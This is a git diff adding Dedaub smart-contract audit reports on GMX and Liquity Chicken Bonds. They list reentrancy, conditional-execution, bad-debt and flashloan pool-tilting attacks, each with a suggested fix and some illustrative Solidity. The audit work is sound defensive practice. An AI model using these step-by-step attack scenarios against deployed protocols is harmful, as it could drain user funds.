diff --git a/.gitmodules b/.gitmodules
index 62c231b..ca2100f 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -4,3 +4,6 @@
 [submodule "pdfs/dedaub-audits"]
 	path = pdfs/dedaub-audits
 	url = https://github.com/Dedaub/audits
+[submodule "pdfs/publications"]
+	path = pdfs/publications
+	url = https://github.com/trailofbits/publications.git
diff --git a/findings_newupdate/dedaub/GMX _ GMX Audit - Oct '22.txt b/findings_newupdate/dedaub/GMX _ GMX Audit - Oct '22.txt
new file mode 100644
index 0000000..bba474e
--- /dev/null
+++ b/findings_newupdate/dedaub/GMX _ GMX Audit - Oct '22.txt
@@ -0,0 +1,13 @@
+C1 Reentrancy vulnerability in cancelOrder STATUS OPEN OrderHandler::cancelOrder, which is an external function, is not protected by a reentrancy guard. Moreover, OrderUtils::cancelOrder (which performs the actual operation) transfers funds to the user (orderStore.transferOut) before updating its state. As a consequence, a malicious adversary could re-enter cancelOrder and execute an arbitrary number of transfers, effectively draining the contract's full balance in the corresponding token.

    function cancelOrder(
        DataStore dataStore,
        EventEmitter eventEmitter,
        OrderStore orderStore,
        bytes32 key,
        address keeper,
        uint256 startingGas
    ) internal {
        Order.Props memory order = orderStore.get(key);
        validateNonEmptyOrder(order);
        if (isIncreaseOrder(order.orderType()) || isSwapOrder(order.orderType())) {
            if (order.initialCollateralDeltaAmount() > 0) {
                orderStore.transferOut(
                    EthUtils.weth(dataStore),
                    order.initialCollateralToken(),
                    order.initialCollateralDeltaAmount(),
                    order.account(),
                    order.shouldConvertETH()
                );
            }
        }
        // Dedaub: state changed after the transfer, also idempotent
        orderStore.remove(key, order.account());

Note that the main re-entrancy method, namely the receive hook of an ETH transfer, is in fact protected by the use of payable(receiver).transfer, which limits the gas available to the adversary's receive hook. Nevertheless, an ERC20 token transfer is an external contract call and should be assumed to potentially pass execution to the adversary. For instance, an ERC777 token (which is ERC20-compatible) implements transfer hooks that could easily be used to perform a reentrancy attack. Note also that the state update (orderStore.remove(key, order.account())) is idempotent, so it can be executed multiple times during a reentrancy attack without causing an error. To protect against reentrancy we recommend: 1. adding reentrancy guards, and 2. executing all state updates before external contract calls (such as transfers). Note that (2) by itself is sufficient, so reentrancy guards can be avoided if gas is an issue. In such a case, however, comments should be added to the code to clearly state that updates must be executed before external calls, to avoid the vulnerability being reintroduced in a future restructuring of the code.
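A minimal sketch of the recommended structure, with simplified types and names (our own illustration, not the actual GMX fix): the order is removed before the external transfer, and a reentrancy guard is added as defense in depth.

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    contract OrderHandlerSketch {
        uint256 private _locked = 1;
        mapping(bytes32 => address) public accountOf;    // order key => owner
        mapping(bytes32 => uint256) public collateralOf; // order key => ETH collateral

        modifier nonReentrant() {
            require(_locked == 1, "reentrancy");
            _locked = 2;
            _;
            _locked = 1;
        }

        function createOrder(bytes32 key) external payable {
            require(accountOf[key] == address(0), "order exists");
            accountOf[key] = msg.sender;
            collateralOf[key] = msg.value;
        }

        function cancelOrder(bytes32 key) external nonReentrant {
            address account = accountOf[key];
            uint256 amount = collateralOf[key];
            require(account == msg.sender, "not order owner");
            // Effects first: delete the order, so a re-entering call
            // fails the ownership check above.
            delete accountOf[key];
            delete collateralOf[key];
            // Interaction last: this call may hand execution to the
            // receiver (ETH receive hook, or ERC777-style token hooks).
            (bool ok, ) = account.call{value: amount}("");
            require(ok, "transfer failed");
        }
    }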
HIGH SEVERITY:
ID Description STATUS
+H1 Conditional execution of orders using shouldConvertETH OPEN For all order types that involve ETH, a user can set the option shouldConvertETH = true to indicate that he wishes to receive ETH instead of WETH. Although convenient, this gives an adversary the opportunity to execute conditional orders in a very easy way. The adversary can simply use a smart contract as the receiver of the order, and set a receive function as follows:

    contract Adversary {
        bool allow_execution = false;
        receive() external payable {
            require(allow_execution);
        }
    }

Then, in the time period between the order's creation and its execution, the adversary can decide whether he wishes the order to succeed or not, and set the allow_execution variable accordingly. If unset, the receive function will revert and the protocol will cancel the order. The possibility of conditional executions could be exploited in a variety of different scenarios; a concrete example is given at the end of this item. Note that the use of payable(receiver).transfer (in Bank::_transferOutEth) does not protect against this attack: the 2300 gas sent by transfer is enough for a simple check like the one above. Note also that, although the case of ETH is the simplest to exploit, any token that uses hooks to allow the receiver to reject transfers (e.g., ERC777) would enable the same attack. Note also that, if needed, the time period between creation and execution could be increased by simultaneously submitting a large number of orders for tiny amounts (see L2 below). One way to protect against conditional execution is to employ some manual procedure for recovering the funds in case of a failed execution (for instance, keeping the funds in an escrow account), instead of simply canceling the order. Since a failed execution should not happen under normal conditions, this would not affect the protocol's normal operation. Concrete example of exploiting conditional executions: the adversary wants to take advantage of the volatility of ETH at a particular moment, but without any trading risk. Assume that the current price of ETH is 1000 USD; he proceeds as follows:
- He creates a market swap order A to buy ETH at the current price. In this order, he sets shouldConvertETH = true and uses the receive function above, which conditionally allows the execution.
- He also creates a limit order B to sell ETH at 1010 USD.
He then monitors the price of ETH before the orders' execution:
- If ETH goes down, he does nothing. allow_execution is false, so order A will fail, and order B will also fail since the price target is not met.
- If ETH goes up, he sets allow_execution = true, which leads to both orders succeeding for a profit of 10 USD / ETH.

MEDIUM SEVERITY:
ID Description
+M1 Incorrect handling of rebasing tokens STATUS OPEN StrictBank::recordTokenIn computes the number of received tokens by comparing the contract's current balance with the balance at the previous execution. However, this approach could lead to incorrect results in the case of ERC20 tokens with non-standard behavior, for instance:
- tokens in which balances automatically increase (without any transfers) to include interest,
- tokens that allow interacting from multiple contract addresses.
To be more robust with respect to such types of tokens, we recommend comparing the balance before and after the current incoming transfer, and not between different transactions.
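A minimal sketch of the recommended measurement (a simplified StrictBank-like contract; names are illustrative, not the actual codebase's):

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
    import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

    // Sketch: diff the balance around the current transfer only, never
    // against a balance recorded in an earlier transaction.
    contract StrictBankSketch {
        using SafeERC20 for IERC20;

        function _recordTransferIn(IERC20 token, address from, uint256 amount)
            internal
            returns (uint256 received)
        {
            uint256 balanceBefore = token.balanceOf(address(this));
            token.safeTransferFrom(from, address(this), amount);
            // Only the delta caused by this transfer is credited, so interest
            // accrual or other balance drift between transactions is ignored.
            received = token.balanceOf(address(this)) - balanceBefore;
        }
    }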
+M2 Self-close bad debt attack OPEN The protocol is susceptible to an attack involving opening a delta-neutral position using Sybil accounts, with maximum leverage, on a volatile asset. Scenario:
1. The attacker controls Alice and Bob.
2. Alice opens a large long position with maximum leverage.
3. Bob opens a large short position with maximum leverage.
4. The market moves.
5. Alice liquidates their underwater position, causing bad debt.
6. Bob closes their other position, profiting on the slippage.
The reason this attack is possible is that, under the current design, it takes multiple blocks for a liquidator to react, and by the time their order is executed it is possible that one of the positions is underwater. Secondly, when liquidating, Alice does not suffer a bad price from the slippage incurred in the liquidation, but Bob benefits from the slippage when closing their position just after. Another factor that contributes towards this attack is that the liquidation penalty is linear, while the price impact advantage is higher-order, making the attack increasingly profitable the larger the positions. To deter this, the protocol could support (i) partial liquidations for large positions, which force positions to be closed gradually, making the attack non-viable, and (ii) factoring slippage into the open-interest calculations used to determine the price of the liquidation.

LOW SEVERITY:
+L1 Missing receive function OPEN OrderStore does not contain a receive function, so it cannot receive ETH. However, this is needed by Bank::_transferOutEth, which withdraws ETH before sending it to the receiver.

    function _transferOutEth(address token, uint256 amount, address receiver) internal {
        require(receiver != address(this), "Bank: invalid receiver");
        IWETH(token).withdraw(amount);
        payable(receiver).transfer(amount);
        _afterTransferOut(token);
    }

Without a receive function, any transaction with shouldConvertETH = true would fail.
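A minimal sketch of the missing function (the WETH-only guard is an assumption here; it mirrors the check suggested for Perp.fi's Vault later in this collection):

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    // Sketch: OrderStore must be able to receive the ETH that WETH.withdraw
    // sends back during Bank::_transferOutEth, and nothing else.
    contract OrderStoreReceiveSketch {
        address public immutable weth;

        constructor(address _weth) {
            weth = _weth;
        }

        receive() external payable {
            require(msg.sender == weth, "OrderStore: sender is not WETH");
        }
    }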
+L2 No lower bounds for swaps and positions OPEN Since there are no lower bounds on the size of a position, someone could in principle create a large number of tiny orders. Such a strategy would cost the adversary only the gas fees and the total amount of the requested positions, which can be as small as he wishes. In the 2-step procedure used in this version of the protocol, such behavior could potentially create a problem, because the order keepers would have to execute a huge number of orders. We suggest setting a minimum size for positions and swaps.

L3 Inconsistency in calculating liquidations OPEN The comment in PositionUtils::isPositionLiquidatable indicates that price impact is not used when computing whether a position is liquidatable. However, the price impact is in fact used in the code:

    // price impact is not factored into the liquidation calculation
    // if the user is able to close the position gradually, the impact
    // may not be as much as closing the position in one transaction
    function isPositionLiquidatable(
        DataStore dataStore,
        Position.Props memory position,
        Market.Props memory market,
        MarketUtils.MarketPrices memory prices
    ) internal view returns (bool) {
        ...
        int256 priceImpactUsd = PositionPricingUtils.getPriceImpactUsd(...)
        int256 remainingCollateralUsd = collateralUsd.toInt256() + positionPnlUsd + priceImpactUsd + fees.totalNetCostAmount;

On the other hand, when the liquidation is executed, the price impact is not used. The comment in DecreasePositionUtils::processCollateral indicates that this is intentional:

    // the outputAmount does not factor in price impact
    // for example, if the market is ETH / USD and if a user uses USDC to long ETH
    // if the position is closed in profit or loss, USDC would be sent out from or
    // added to the pool without a price impact
    // this may unbalance the pool and the user could earn the positive price impact
    // through a subsequent action to rebalance the pool
    // price impact can be factored in if this is not desirable

If this inconsistency is intentional, it should be properly documented in the comments. Note that, when deciding on a liquidation strategy, you should keep in mind the possibility of cascading liquidations, namely the possibility that executing a liquidation causes other positions to become liquidatable.

CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocol's owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-profile, high-value protocols have significant centralization threats.)

ID Description
+N1 Order keepers can cause DoS in all operations OPEN Due to the two-step execution system, any operation requires an order keeper to execute it. Trust is needed that order keepers will timely execute all pending orders. If the order keepers do not submit execution transactions, all operations will cease to function, including closing positions and withdrawing funds. It would be beneficial to implement fallback mechanisms that guarantee that users can at least withdraw their funds in case order keepers cease to function for any reason. For instance, the protocol could allow users to execute orders by providing oracle prices themselves, but only if an order is stale (a certain time has passed since its creation).
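A minimal sketch of such a staleness fallback (all names, the one-hour threshold, and the keeper bookkeeping are illustrative assumptions; a real design must also validate the user-provided prices, e.g., against signed oracle data):

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    abstract contract StaleOrderFallbackSketch {
        uint256 public constant STALENESS = 1 hours;

        mapping(bytes32 => uint256) public createdAt; // order key => creation time
        mapping(address => bool) public isOrderKeeper;

        function executeOrder(bytes32 key) external {
            if (!isOrderKeeper[msg.sender]) {
                // Permissionless path only for orders the keepers have ignored.
                require(
                    block.timestamp >= createdAt[key] + STALENESS,
                    "only keepers may execute fresh orders"
                );
            }
            _execute(key);
        }

        function _execute(bytes32 key) internal virtual;
    }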
N2 Order keepers can frontrun/reorder transactions There is nothing in the current system that prevents an order keeper from front-running or reordering transactions, for instance to exploit changes in the price impact. The protocol could include mechanisms that limit this possibility: for instance, the order keeper could be forced to execute orders in the same order they were created.

OTHER / ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them.

ID Description STATUS
+A1 Possible erroneous computation of price impact INFO Price impact is calculated as (initial imbalance) ^ (price impact exponent) * (price impact factor) - (next imbalance) ^ (price impact exponent) * (price impact factor). The values of the exponent (e) and the impact factor (f) are set by the protocol for each market. If the impact factor is simply a percentage, then the price impact will have units of USD^(price impact exponent). This seems erroneous, since the price impact is treated as a USD amount, which is finally added to the amount requested by the user. A problem arises in case these two quantities are selected independently of each other, but also of the pool's deposits and status. For example, consider a pool with tokens A and B of total USD value x and y respectively, with x < y. Then the imbalance equals d = y - x. If a user swaps A tokens worth d/2, then prior to the price impact he will get B tokens of the same value. The new deposits of the pool will be x' = y' = (x + y)/2 and the pool will become balanced. The price impact for this transaction is f*d^e, which (if the parameters are not chosen carefully) could be larger than d/2, the requested swap amount. This could also leave the pool even more imbalanced than in the previous state. We suggest that (total_deposits)^(e-1) * f always be kept less than 1 to avoid the above-mentioned undesirable behavior.
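To make the unit concern concrete, consider a worked example with illustrative numbers of our own (not from any deployed market). Let x = 100,000 USD and y = 300,000 USD, so d = y - x = 200,000 USD and total deposits are 400,000 USD. With e = 2 and f = 5e-6 (per USD), swapping d/2 = 100,000 USD of token A incurs a price impact of f*d^e = 5e-6 * 200,000^2 = 200,000 USD, twice the swapped amount. The suggested bound indeed rejects these parameters: (total_deposits)^(e-1) * f = 400,000 * 5e-6 = 2, which is greater than 1.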
+A2 Inconsistency in the submission time of different tokens INFO Price keepers are responsible for submitting prices for most of the protocol's tokens. The submitted price should be the price retrieved from exchange markets at the time of each order's creation (the median of all these prices is finally used). However, for some tokens Chainlink oracles are used; in this case, the price at the time of the order's execution is used.

+A3 A user can liquidate their own position INFO ExchangeRouter::createLiquidation can be called only by liquidation keepers. However, there is nothing preventing a user from calling createOrder with orderType = Liquidation, effectively creating a liquidation order for their own position. Although this is not necessarily an issue, it is unclear whether this functionality is intentional or not.

+A4 Inefficient price impacts on large markets INFO The price impact calculation is a function with an exponential factor of the absolute differences between open long and short interests before and after a trade. This works well for the average market, but on a large market with large open interests, it is not more efficient to open large positions. Consider that in other AMM designs, it is possible to open large positions with minimal price impact if the market is large (e.g., Uniswap ETH-USDC).

A5 Known compiler bugs INFO The code can be compiled with Solidity 0.8.0 or higher. For deployment, we recommend no floating pragmas, but a specific version, to be confident about the baseline guarantees offered by the compiler. Version 0.8.0, in particular, has some known bugs, which we do not believe affect the correctness of the contracts.

diff --git a/findings_newupdate/dedaub/Liquity _ B.Protocol - Chicken Bonds Audit.txt b/findings_newupdate/dedaub/Liquity _ B.Protocol - Chicken Bonds Audit.txt
new file mode 100644
index 0000000..0997352
--- /dev/null
+++ b/findings_newupdate/dedaub/Liquity _ B.Protocol - Chicken Bonds Audit.txt
@@ -0,0 +1,4 @@
+M1 The integration of ChickenBonds with BAMM allows limited financial manipulation (attacker can get maximum discount) STATUS RESOLVED (commit a55871ec takes the Curve LUSD, in virtual terms, also into account) BAMMSP holds not only LUSD, but also ETH from liquidations. Anyone can buy ETH at a discount, which depends on the relative amounts of LUSD and ETH in the BAMMSP. In essence, the larger the amount of ETH compared to LUSD, the larger the discount. An attacker could act as follows: call shiftLUSDFromSPToCurve of the Chicken Bond protocol, decrease the amount of LUSD in BAMMSP and then buy ETH at a greater discount. There are no restrictions on who can call the shiftLUSDFromSPToCurve function, but the shift of the LUSD amounts takes place only if the LUSD price in Curve is too high. If this condition is satisfied, the attacker can perform the attack in order to buy ETH at a maximum discount at no extra cost. If not, then the attacker should first manipulate the price at Curve using a flashloan. The steps are the following:
1. Increase the price of LUSD in the Curve pool above the threshold that allows shifting from the SP to Curve, possibly using a flashloan.
2. Call shiftLUSDFromSPToCurve and move as much LUSD as possible to increase the discount on ETH.
3. Buy ETH from BAMMSP at a discount.
4. Repay the flashloan.
This attack is profitable in a specific price range for LUSD, close to the "too high" threshold (otherwise the cost of tilting the pool will likely outweigh any benefit from the discount), and the discount is bounded (at 4%, based on the design documents we were supplied). Hence, we consider this only a medium-severity issue. A general consideration of the profitability of the attack should take into account: a) that the second step drops the price of LUSD in Curve, resulting in losses for the attacker when he repays the flashloan in the 4th step; b) that, however, the amount of ETH the attacker can buy from BAMMSP at a discount is independent of the amounts in the Curve pool, so under some circumstances the discount may also compensate for the losses, making the attack profitable.

+M2 Uniswap v3 TWAPs can be manipulated, and this will become much easier post-Merge DISMISSED A Uniswap v3 TWAP is expected to be used to price LQTY relative to ETH. Uniswap v3 TWAPs can be manipulated, especially for less-used pools. (There have been at least three instances of attacks already, for pools with liquidity in the low millions. The LQTY-ETH pool currently has $780K of liquidity.) Although manipulation of active pools is currently considered rarely profitable, once Ethereum switches to proof-of-stake (colloquially, after the Merge) such manipulation will be much easier to perform with guaranteed profit. Specifically, to manipulate a data point used for a Uniswap v3 TWAP, an attacker needs to control two consecutive pool transactions (i.e., transactions over the manipulated pool) that are in separate blocks. (This typically means the last pool transaction of a block and the first of the next block.) Under Ethereum proof-of-stake, validators are known in advance (at the beginning of the epoch), hence an attacker can know when they are guaranteed to control the validator of the next block. The attack is: the attacker places the first transaction as the last pool transaction of the previous block (either by being the validator of both blocks or by using flashbots). The first transaction tilts the pool. The attacker is guaranteed to not suffer any losses from swaps over the tilted pool, because the attacker controls the immediately next block, prepending to it a transaction that restores the pool, while affecting a TWAP data point with the unrealistic price in this way. The issue is at most medium-severity, because it only concerns selling LQTY, not the principal assets of the contracts.

M3 Values from Chainlink are not checked DISMISSED The protocol does not check whether the LUSD-USD price is successfully returned from Chainlink in BAMM::compensateForLusdDeviation and GemSeller::compensateForLusdDeviation. Since this price is used to adjust the amount of ETH or LQTY returned by a swap in BAMM and GemSeller respectively, it is important to ensure that the values from Chainlink are accurate and correct. This is in contrast with how Chainlink ETH-USD prices are retrieved in BAMM::fetchPrice and GemSeller::fetchPrice, where each call to Chainlink is checked and any failures are reported using a return value of 0.
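For illustration, a checked-call wrapper in the style the report contrasts with (fetchPrice-like; the feed interface is Chainlink's AggregatorV3Interface, the remaining names are our own):

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.6.11;

    interface AggregatorV3Interface {
        function latestRoundData()
            external
            view
            returns (uint80 roundId, int256 answer, uint256 startedAt, uint256 updatedAt, uint80 answeredInRound);
    }

    // Sketch: failures and non-positive answers are reported as 0, the
    // convention the report describes for fetchPrice.
    contract CheckedChainlinkSketch {
        AggregatorV3Interface public immutable feed;

        constructor(AggregatorV3Interface _feed) public {
            feed = _feed;
        }

        function fetchLusdUsdPrice() public view returns (uint256) {
            try feed.latestRoundData() returns (uint80, int256 answer, uint256, uint256 updatedAt, uint80) {
                if (answer <= 0 || updatedAt == 0) return 0; // treat bad data as failure
                return uint256(answer);
            } catch {
                return 0; // report failure instead of using an unchecked value
            }
        }
    }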
LOW SEVERITY: [No low severity issues]

CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocol's owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-profile, high-value protocols have centralization threats.)

ID Description STATUS
N1 Owner can set parameters with financial impact DISMISSED The owner of both the BAMM contract and the GemSeller contract can set several parameters with financial impact. None is a major threat: the principal deposited by the Chicken Bonds protocol is safe, even if the owner of BAMM is malicious. However, some funds are at threat. Specifically:
(BAMM) Owners can set the chicken address. The chicken address holds considerable control over the protocol, as it is the only address permitted to withdraw or deposit funds in the system. However, since this address can only ever be set once, the risk posed is limited. Once this address is set to the ChickenBondManager contract from the LUSD Chicken Bonds protocol, this will no longer be an issue, as ChickenBondManager is itself very decentralized.
(BAMM) Owners can set the gemSeller address. This is a centralization threat because the gemSeller has infinite approval for the gem, in this case LQTY. However, this means that a malicious owner can only steal rewards, not principal. Furthermore, the gemSellerController makes use of a time-lock system. This prevents the owner from immediately changing the address of the gemSeller: a new address will first be stored as pending, and can only be set as the new gemSeller after a fixed time period has elapsed. Once set, the gemSeller has maximum approval for all LQTY held in the B.AMM.
(BAMM and gemSeller) Owners can set parameters, including the fee and A. The fee parameter is a threat, but is bounded by a maximum value (1% in BAMM, 10% in gemSeller). The A parameter only affects the discount given to buyers, which is bounded by a maximum, limiting the effect of any changes.
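For reference, a minimal sketch of the pending/time-lock pattern described above (contract name, constant, and the two-step flow details are illustrative, not B.AMM's actual implementation):

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.6.11;

    contract TimelockedSetterSketch {
        address public owner;
        address public gemSeller;
        address public pendingGemSeller;
        uint256 public pendingSince;
        uint256 public constant DELAY = 2 weeks; // illustrative duration

        constructor() public {
            owner = msg.sender;
        }

        function proposeGemSeller(address newSeller) external {
            require(msg.sender == owner, "only owner");
            pendingGemSeller = newSeller;
            pendingSince = block.timestamp;
        }

        function applyGemSeller() external {
            require(pendingGemSeller != address(0), "nothing pending");
            require(block.timestamp >= pendingSince + DELAY, "timelock active");
            gemSeller = pendingGemSeller;
            pendingGemSeller = address(0);
        }
    }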
OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them.

ID Description STATUS
+A1 Typo in BAMM::constructor parameter RESOLVED Parameter address _fronEndTag should be address _frontEndTag.

+A2 Misrepresentative function names when converting LUSD RESOLVED The functions gemSeller::gemToLUSD and gemSeller::LUSDToGem convert the given quantity of gem tokens to their LUSD value and vice versa. However, the functions both return the USD price of the gem asset, not the LUSD price (more accurately, the GEM-ETH and ETH-USD prices are used together). Although the protocol assumes that 1 LUSD is always equivalent to 1 USD, gemSeller::gemToUSD and gemSeller::USDToGem would be more accurate function names.

A3 Compiler bugs INFO The code is compiled with Solidity 0.6.11. This version of the compiler has some known bugs, which we do not believe to affect the correctness of the contracts.

diff --git a/findings_newupdate/dedaub/Liquity _ Chicken Bonds Audit.txt b/findings_newupdate/dedaub/Liquity _ Chicken Bonds Audit.txt
new file mode 100644
index 0000000..4eab5b5
--- /dev/null
+++ b/findings_newupdate/dedaub/Liquity _ Chicken Bonds Audit.txt
@@ -0,0 +1,5 @@
+H1 Stability Pool deposits can be manipulated for possible gain STATUS RESOLVED (mitigated by commit cf15a5ac: time delay for shifting, limited shift window) The Chicken Bonds protocol gives arbitrary callers the ability to shift liquidity out of the stability pool and into Curve, when the price of LUSD (on Curve) is too high. This can be abused for a financial attack if the protocol (i.e., the B.AMMSP) becomes a major shareholder of stability pool liquidity, as expected. Consider a scenario where the attacker notices a large liquidation coming in. Stability pool shareholders stand to gain up to 10%. The attacker wants to eliminate the B.AMMSP share from the stability pool and receive a larger part of the gains. The attacker can tilt the Curve pool (e.g., via flashloan) to get the LUSD price outside the acceptable threshold (too high). With a subsequent call of shiftLUSDFromSPToCurve, liquidity gets removed from the stability pool.
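The mitigation referenced in the resolution (a time delay for shifting and a limited shift window) could look roughly like the following sketch; all names and durations are illustrative assumptions, not the actual commit:

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.10;

    abstract contract ShiftWindowSketch {
        uint256 public constant SHIFT_DELAY = 1 hours;     // delay after signalling intent
        uint256 public constant SHIFT_WINDOW = 10 minutes; // window in which shifting is allowed

        uint256 public shiftWindowStart;

        // A real implementation would likely restrict restarting the
        // countdown while one is already pending.
        function startShiftCountdown() external {
            shiftWindowStart = block.timestamp + SHIFT_DELAY;
        }

        function shiftLUSDFromSPToCurve(uint256 maxLUSDToShift) external {
            require(
                block.timestamp >= shiftWindowStart &&
                    block.timestamp < shiftWindowStart + SHIFT_WINDOW,
                "shift not in window"
            );
            _shift(maxLUSDToShift);
        }

        function _shift(uint256 maxLUSDToShift) internal virtual;
    }

The delay prevents a flashloan-style same-transaction tilt-and-shift, since the attacker must commit to the shift ahead of time, across blocks.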
+H2 An attack tilting the Curve pool before a redeem allows the attacker to draw funds from the permanent bucket RESOLVED (commit 900d481a makes all Curve accounting be in virtual/relative terms) There is a Curve-pool-tilt attack upon a redeem operation. The core of the issue is that a storage variable, permanentLUSDInCurve, is maintained between transactions:

    uint256 private permanentLUSDInCurve; // Yearn Curve LUSD-3CRV vault

    function shiftLUSDFromSPToCurve(uint256 _maxLUSDToShift) external {
        ...
        uint256 permanentLUSDCurveIncrease = (lusdInCurve - lusdInCurveBefore) * ratioPermanentToOwned / 1e18;
        permanentLUSDInCurve += permanentLUSDCurveIncrease;
        ...
    }

    function shiftLUSDFromCurveToSP(uint256 _maxLUSDToShift) external {
        ...
        uint256 permanentLUSDWithdrawn = lusdBalanceDelta * ratioPermanentToOwned / 1e18;
        permanentLUSDInCurve -= permanentLUSDWithdrawn;
        ...
    }

The problem is that this quantity does not really reflect the current amounts of LUSD in Curve, which are subject to fluctuations due to normal swaps or malicious pool manipulation. The permanentLUSDInCurve is then used in the computation of the acquired LUSD in Curve:

    function getAcquiredLUSDInCurve() public view returns (uint256) {
        uint256 acquiredLUSDInCurve;
        // Get the LUSD value of the LUSD-3CRV tokens
        uint256 totalLUSDInCurve = getTotalLUSDInCurve();
        if (totalLUSDInCurve > permanentLUSDInCurve) {
            acquiredLUSDInCurve = totalLUSDInCurve - permanentLUSDInCurve;
        }
        return acquiredLUSDInCurve;
    }

A redeem computes the amount to return to the caller using the above function, as a proportion of the acquired LUSD in Curve:

    function redeem(uint256 _bLUSDToRedeem, uint256 _minLUSDFromBAMMSPVault) external returns (uint256, uint256) {
        uint256 acquiredLUSDInCurveToRedeem = getAcquiredLUSDInCurve() * fractionOfBLUSDToRedeem / 1e18;
        uint256 lusdToWithdrawFromCurve = acquiredLUSDInCurveToRedeem * (1e18 - redemptionFeePercentage) / 1e18;
        uint256 acquiredLUSDInCurveFee = acquiredLUSDInCurveToRedeem - lusdToWithdrawFromCurve;
        yTokensFromCurveVault = _calcCorrespondingYTokensInCurveVault(lusdToWithdrawFromCurve);
        if (yTokensFromCurveVault > 0) {
            yearnCurveVault.transfer(msg.sender, yTokensFromCurveVault);
        }

As a result, the attack consists of lowering the price of LUSD in Curve, by swapping in a lot of LUSD, so that the Curve pool holds a much larger amount of LUSD. The permanentLUSDInCurve remains as stored from the previous transaction and gets subtracted, so that the acquired LUSD in Curve appears to be much higher. The attacker calls redeem and receives a proportion of that amount (minus fees), effectively stealing from the permanent LUSD. The general recommendation is to not store between transactions any amount reflecting Curve balances (either total or partial). If a partial balance is to be kept, it should be kept in relative terms (i.e., as a proportion), not in absolute token amounts.

MEDIUM SEVERITY: [No medium severity issues]

LOW SEVERITY:
ID Description STATUS
L1 Unsafe Curve operation (on possibly tilted pool) upon _firstChickenIn RESOLVED (commit 30c45567: depletion of bLUSD prevented) [This issue is rated low severity because a firstChickenIn after initial deployment is unlikely. The core threat remains.] The code of firstChickenIn effectively performs an unprotected swap of the full balance of Curve yield at the time (a remove_liquidity_one_coin functionally includes a swap):

    function _firstChickenIn(uint256 _bondStartTime, uint256 _bammLUSDValue, uint256 _lusdInBAMMSPVault) internal returns (uint256) {
        // From Curve Vault
        uint256 lusdFromInitialYieldInCurve = getAcquiredLUSDInCurve();
        uint256 yTokensFromCurveVault = _calcCorrespondingYTokensInCurveVault(lusdFromInitialYieldInCurve);
        // withdraw LUSD3CRV from Curve Vault
        if (yTokensFromCurveVault > 0) {
            _withdrawFromCurveVaultAndTransferToRewardsStakingContract(yTokensFromCurveVault);
        }
    }

    function _withdrawFromCurveVaultAndTransferToRewardsStakingContract(uint256 _yTokensToSwap) internal {
        uint256 LUSD3CRVBalanceBefore = curvePool.balanceOf(address(this));
        yearnCurveVault.withdraw(_yTokensToSwap);
        uint256 LUSD3CRVBalanceDelta = curvePool.balanceOf(address(this)) - LUSD3CRVBalanceBefore;
        // obtain LUSD from Curve
        if (LUSD3CRVBalanceDelta > 0) {
            uint256 lusdBalanceBefore = lusdToken.balanceOf(address(this));
            // Dedaub: attackable!
            curvePool.remove_liquidity_one_coin(LUSD3CRVBalanceDelta, INDEX_OF_LUSD_TOKEN_IN_CURVE_POOL, 0);
            uint256 lusdBalanceDelta = lusdToken.balanceOf(address(this)) - lusdBalanceBefore;
            _transferToRewardsStakingContract(lusdBalanceDelta);
        }
    }

If the yield that is being swapped is ever high, an attacker can tilt the Curve pool to make LUSD appear very expensive and make the remove_liquidity_one_coin return much lower amounts, effectively making the contract spend its Curve LP tokens for nothing in return. (The attacker will receive the proceeds upon restoring the pool.) This attack is currently highly unlikely because a real first-ever chicken in will find no past yield, and a subsequent firstChickenIn is unlikely to occur because there is significant financial motivation for the last bLUSD holders to not redeem, if there is yield. So it is unlikely that the balance of bLUSD will ever again drop to zero.

OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them.

ID Description STATUS
+A1 Simplification in exponentiation RESOLVED Iterative exponentiation by squaring (ChickenMath::decPow) could be simplified slightly from:

    while (n > 1) {
        if (n % 2 == 0) {
            x = decMul(x, x);
            n = n / 2;
        } else { // if (n % 2 != 0)
            y = decMul(x, y);
            x = decMul(x, x);
            n = (n - 1) / 2;
        }
    }

to:

    while (n > 1) {
        if (n % 2 != 0) {
            y = decMul(x, y);
        }
        x = decMul(x, x);
        n = n / 2;
    }

We only recommend this change for reasons of elegance, not impact.
+A2 Assert unnecessary RESOLVED There is an assert statement in _firstChickenIn that is currently unnecessary.

    function _firstChickenIn(...) internal returns (uint256) {
        assert(!migration);

The function is currently only called under conditions that preclude the assert:

    if (bLUSDToken.totalSupply() == 0 && !migration) {
        lusdInBAMMSPVault = _firstChickenIn(bond.startTime, bammLUSDValue, lusdInBAMMSPVault);
    }

More generally, although there is a long-standing software engineering practice encouraging asserts for circumstances that should never arise, we discourage their use in deployed blockchain code, since asserts in the EVM do have a run-time cost.

+A3 Unnecessary computation of minimum DISMISSED, INVALID (will remove) The minimum computation in the code below has a pre-determined outcome:

    function shiftLUSDFromSPToCurve(uint256 _maxLUSDToShift) external {
        (uint256 bammLUSDValue, uint256 lusdInBAMMSPVault) = _updateBAMMDebt();
        uint256 lusdOwnedInBAMMSPVault = bammLUSDValue - pendingLUSD;
        // Make sure pending bucket is not moved to Curve, so it can be
        // withdrawn on chicken out
        uint256 clampedLUSDToShift = Math.min(_maxLUSDToShift, lusdOwnedInBAMMSPVault);
        // Make sure there's enough LUSD available in B.Protocol
        clampedLUSDToShift = Math.min(clampedLUSDToShift, lusdInBAMMSPVault);
